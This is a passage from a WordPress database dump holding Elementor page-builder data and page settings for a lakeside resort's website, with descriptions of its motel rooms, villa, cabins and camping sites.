":\"image\"}],\"isInner\":true},{\"id\":\"1d86d5d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"f3c51bd\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"102abed\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d557fa6\"}]},\"elements\":[{\"id\":\"015be59\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4149.jpg\",\"id\":464}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"4985a47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"24ea3dc\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"15ff13c\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"67e542a\"}]},\"elements\":[{\"id\":\"5c5981a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4151.jpg\",\"id\":465},\"image_border_width\":{\"unit\":\"px\",\"top\":\"6\",\"right\":\"6\",\"bottom\":\"6\",\"left\":\"6\",\"isLinked\":true},\"image_border_color\":\"#7a7a7a\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7dad932\",\"elType\":\"section\",\"settings\":{\"border_border\":\"solid\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"0e0de0e\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8f3928c\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b94c487\"}]},\"elements\":[{\"id\":\"6cb5af4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"fbba353\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9cdbe3f\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"e33d470\"}]},\"elements\":[{\"id\":\"641f976\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Sleepers #2, #4 and #6<\\/strong><\\/p><p>Are one bedroom \\u2013 1 bathroom and 1 Double Bed with a hide a bed sofa in the main living area.<br \\/> Maximum people 4.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9188508\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"f9f470e\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ff282b8\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"9fa2d93\"}]},\"elements\":[{\"id\":\"7961de2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"f2e388c\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2d6e7ec\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"dca8900\"}]},\"elements\":[{\"id\":\"a81ffee\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN42011.jpg\",\"id\":541}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"2043fd8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1d2713d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"93c74aa\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"38e4916\"}]},\"elements\":[{\"id\":\"99dab09\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN41971.jpg\",\"id\":539},\"image_border_width\":{\"unit\":\"px\",\"top\":\"6\",\"right\":\"6\",\"bottom\":\"6\",\"left\":\"6\",\"isLinked\":true},\"image_border_color\":\"#7a7a7a\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"19dbffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"059aaf5\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"494138e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c136dd1\"}]},\"elements\":[{\"id\":\"05b0b6f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN42001.jpg\",\"id\":540}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18f6ad5\",\"elType\":\"section\",\"settings\":{\"border_border\":\"solid\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"6a3f9d8\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"bc9849a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4500032\"}]},\"elements\":[{\"id\":\"c16586f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"e51bd4d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"aa61889\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"06c9f69\"}]},\"elements\":[{\"id\":\"8137cdf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lakeside Villa #9<\\/strong><\\/p><p>Unit # 9 is one of the most popular units newly remodeled in 2015. This unit has 2 bedrooms. One bedroom has a queen bed with a sliding glass door to the lake.<br \\/>The second bedroom has two single beds. The bathroom has a large walk in shower. This unit also has a door off the kitchen to go out to the lake.<br \\/>Maximum people 4. No pets. No Smoking.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4bba88e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a85728e\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8d8736a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"0567beb\"}]},\"elements\":[{\"id\":\"c9c91ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"cdfea3f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"5fc4265\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"39410d5\"}]},\"elements\":[{\"id\":\"f96e083\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4157.jpg\",\"id\":468}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"a7e2877\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2e0b5c9\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"5244ee8\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"955d6bd\"}]},\"elements\":[{\"id\":\"0172296\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4155.jpg\",\"id\":467},\"image_border_width\":{\"unit\":\"px\",\"top\":\"6\",\"right\":\"6\",\"bottom\":\"6\",\"left\":\"6\",\"isLinked\":true},\"image_border_color\":\"#7a7a7a\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"96c0fd8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"bdf024f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"f3002db\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"2bff9ec\"}]},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1778,739,'_elementor_template_type','post'),(1779,739,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(1792,37,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(1793,742,'_wp_page_template','default'),(1794,742,'_elementor_edit_mode','builder'),(1795,742,'_elementor_version','0.4'),(1796,742,'_elementor_data','[{\"id\":\"9817a90\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"c46e193\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"7f1393b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c0654af\"}]},\"elements\":[{\"id\":\"e424741\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"5a4d7fb\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"3b9a49c\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"65f4100\"}]},\"elements\":[{\"id\":\"466f112\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>All of our <a href=\\\"http:\\/\\/ashbyresort.com\\/motel\\/\\\">Motel rooms<\\/a>, <a href=\\\"http:\\/\\/ashbyresort.com\\/cabins\\/\\\">Cabins<\\/a> and <a href=\\\"http:\\/\\/ashbyresort.com\\/large-cabins\\/\\\">New Cabins<\\/a> are lakeside on level grounds with a park like setting that is even more captivating during our beautiful sunsets. We also have <a href=\\\"http:\\/\\/ashbyresort.com\\/campgrounds\\/\\\">Tent and RV camping sites<\\/a> available.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e1f964\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1a66592\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"0f83537\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d3038b8\"}]},\"elements\":[{\"id\":\"da0325a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"ae8dc82\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"f0cb7d3\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"bec433c\"}]},\"elements\":[{\"id\":\"373f2ba\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSC00168.jpg\",\"id\":112},\"caption\":\"MOTEL KITCHENETTES & SLEEPERS\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ashbyresort.com\\/motel\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6894a84\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8b813b8\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"691f3cb\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d6b0346\"}]},\"elements\":[{\"id\":\"c4107d6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Carly-008.jpg\",\"id\":287},\"caption\":\"CABINS\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ashbyresort.com\\/cabins\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5fb2129\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"0392b17\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"16f5fd8\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"f6c95fc\"}]},\"elements\":[{\"id\":\"4d11d8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3477.jpg\",\"id\":354},\"caption\":\"NEWER CABINS\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ashbyresort.com\\/large-cabins\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"950d353\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8cb56ad\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"20cbc4b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"aaee620\"}]},\"elements\":[{\"id\":\"930f206\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3881.jpg\",\"id\":253},\"caption\":\"CAMPING\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ashbyresort.com\\/campgrounds\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1797,742,'_elementor_template_type','post'),(1799,742,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(1800,744,'_wp_page_template','default'),(1801,744,'_elementor_edit_mode','builder'),(1802,744,'_elementor_version','2.5.12'),(1803,744,'_elementor_data','[{\"id\":\"4e2861b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8c3aa6f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"659b4e4\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"9e402ae\"}]},\"elements\":[{\"id\":\"01c17bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1647b79\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"02c2bab\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"65482ce\"}]},\"elements\":[{\"id\":\"a7e9fc6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong> Stay in a Motel Room \\u2013 <\\/strong><strong><a href=\\\"http:\\/\\/ashbyresort.com\\/calendar\\/\\\">Call us at 218-747-2959 to book it<\\/a>\\u00a0 <br \\/><\\/strong><\\/p><p><strong>All motel rooms are available nightly, weekly and long term.<\\/strong><\\/p><p><strong>All units are non smoking !!<\\/strong><\\/p><p><strong>We have motel units with kitchens \\u201cKitchenettes\\u201d<br \\/>and we have units without kitchens \\u201cSleepers\\u201d.<br \\/>or our 2 bedroom Lakeside Villa.<br \\/><\\/strong><\\/p><p>All units are lakeside on level grounds with a park-like setting that is even more captivating during our beautiful sunsets.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"50c4bfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"85b2dfc\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"3b6597b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ce21cee\"}]},\"elements\":[{\"id\":\"4e66d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Motel.jpg\",\"id\":302},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"640\",\"height\":\"300\"},\"align\":\"center\",\"image_border_border\":\"solid\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6542a16\",\"elType\":\"section\",\"settings\":{\"border_border\":\"solid\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9169c2a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2e3ee46\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"baa1ca0\"}]},\"elements\":[{\"id\":\"23e9738\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1246eae\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"4831bc2\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"88fa4da\"}]},\"elements\":[{\"id\":\"808cf47\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kitchenettes #1, 3, 5 &amp; 7<\\/strong><\\/p><p>Are 1 bedroom \\u2013 1 bathroom with 2 double beds Maximum people 4<\\/p><p>also included in a Kitchenette unit is:<br \\/> A Stove (Ovens in #3 &amp; 7 only), microwave, refrigerator, coffee maker, toaster, pots, pans, dishes, TV and airconditioning<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"03f13de\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"194384d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2c409aa\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4855a6f\"}]},\"elements\":[{\"id\":\"c025d32\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"4f25776\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9599ca8\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"881e1ea\"}]},\"elements\":[{\"id\":\"7e98a34\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4153.jpg\",\"id\":466}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"1d86d5d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"f3c51bd\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"102abed\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d557fa6\"}]},\"elements\":[{\"id\":\"015be59\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4149.jpg\",\"id\":464}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"4985a47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"24ea3dc\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"15ff13c\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"67e542a\"}]},\"elements\":[{\"id\":\"5c5981a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4151.jpg\",\"id\":465},\"image_border_width\":{\"unit\":\"px\",\"top\":\"6\",\"right\":\"6\",\"bottom\":\"6\",\"left\":\"6\",\"isLinked\":true},\"image_border_color\":\"#7a7a7a\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7dad932\",\"elType\":\"section\",\"settings\":{\"border_border\":\"solid\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"0e0de0e\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8f3928c\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b94c487\"}]},\"elements\":[{\"id\":\"6cb5af4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"fbba353\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9cdbe3f\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"e33d470\"}]},\"elements\":[{\"id\":\"641f976\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Sleepers #2, #4 and #6<\\/strong><\\/p><p>Are one bedroom \\u2013 1 bathroom and 1 Double Bed with a hide a bed sofa in the main living area.<br \\/> Maximum people 4.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9188508\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"f9f470e\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ff282b8\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"9fa2d93\"}]},\"elements\":[{\"id\":\"7961de2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"f2e388c\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2d6e7ec\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"dca8900\"}]},\"elements\":[{\"id\":\"a81ffee\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN42011.jpg\",\"id\":541}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"2043fd8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1d2713d\"},{\"eae_animated_gradient_color\":\"#b